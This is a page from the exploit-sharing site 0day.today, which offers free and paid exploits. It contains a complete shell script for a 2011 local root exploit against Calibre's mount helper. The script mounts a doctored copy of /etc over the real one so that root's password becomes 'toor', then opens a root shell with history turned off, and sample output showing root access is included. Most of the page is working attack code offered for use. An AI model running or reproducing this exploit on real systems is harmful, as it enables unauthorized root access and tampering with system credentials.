0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Calibre E-Book Reader Local Root Exploit
# Exploit Title: .60-Calibrer Assault Mount: Another Calibre E-Book Reader Local Root # Date: Nov 2, 2011 # Author: zx2c4 # Software Link: http://calibre-ebook.com/ # Tested on: Gentoo # Platform: Linux # Category: Local # CVE: pending #!/bin/sh ####################################### # .60-Calibrer Assault Mount # # by zx2c4 # ####################################### ################################################################################ # Yesterday we learned how Calibre's usage of execlp allowed us to override PATH # and get root, in my ".50-Calibrer Assault Mount" exploit. Today we exploit a # more fundumental issue with Calibre's mount helper -- namely, that it allows # us to mount a vfat filesystem anywhere we want. By mounting a file system # image over /etc, we are able to tinker /etc/passwd and make the root password # temporarily "toor". # # - zx2c4 # 2011-11-2 # # Usage: # $ ./60calibrerassaultmount.sh # [+] Making temporary directory: /tmp/tmp.OGgS0jaoD4 # [+] Making overlay image: # 51200+0 records in # 51200+0 records out # 26214400 bytes (26 MB) copied, 0.100984 s, 260 MB/s # mkfs.vfat 3.0.11 (24 Dec 2010) # [+] Mounting overlay image using calibre-mount-helper. # [+] Copying /etc into overlay. # [+] Tampering with overlay's passwd. # [+] Unmounting overlay image using calibre-mount-helper. # [+] Mounting overlay to /etc using calibre-mount-helper. # [+] Asking for root. When prompted for a password, enter 'toor'. # Password: [typed in toor to the terminal] # [+] Unmounting /etc using root umount. # [+] Cleaning up: /tmp/tmp.OGgS0jaoD4 # [+] Getting shell. # sh-4.2# id # uid=0(root) gid=0(root) groups=0(root) # sh-4.2# whoami # root # sh-4.2# ################################################################################ echo "#######################################" echo "# .60-Calibrer Assault Mount #" echo "# by zx2c4 #" echo "#######################################" echo echo -n "[+] Making temporary directory: " dir="$(mktemp -d)" echo "$dir" cd "$dir" echo "[+] Making overlay image:" dd if=/dev/zero of=overlay count=51200 /usr/sbin/mkfs.vfat overlay echo "[+] Mounting overlay image using calibre-mount-helper." mkdir staging calibre-mount-helper mount overlay staging echo "[+] Copying /etc into overlay." cd staging/ cp -a /etc/* . 2>/dev/null echo "[+] Tampering with overlay's passwd." cat passwd | tail -n +2 > tmp echo "root:$(echo -n 'toor' | openssl passwd -1 -stdin):0:0:root:/root:/bin/bash" >> tmp mv tmp passwd echo "[+] Unmounting overlay image using calibre-mount-helper." cd .. calibre-mount-helper eject overlay staging >/dev/null 2>&1 echo "[+] Mounting overlay to /etc using calibre-mount-helper." calibre-mount-helper mount overlay /etc >/dev/null 2>&1 cd / echo "[+] Asking for root. When prompted for a password, enter 'toor'." su -c "echo \"[+] Unmounting /etc using root umount.\"; umount /etc; echo \"[+] Cleaning up: $dir\"; rm -rf \"$dir\"; echo \"[+] Getting shell.\"; HISTFILE=\"/dev/null\" exec /bin/sh" # 0day.today [2024-10-06] #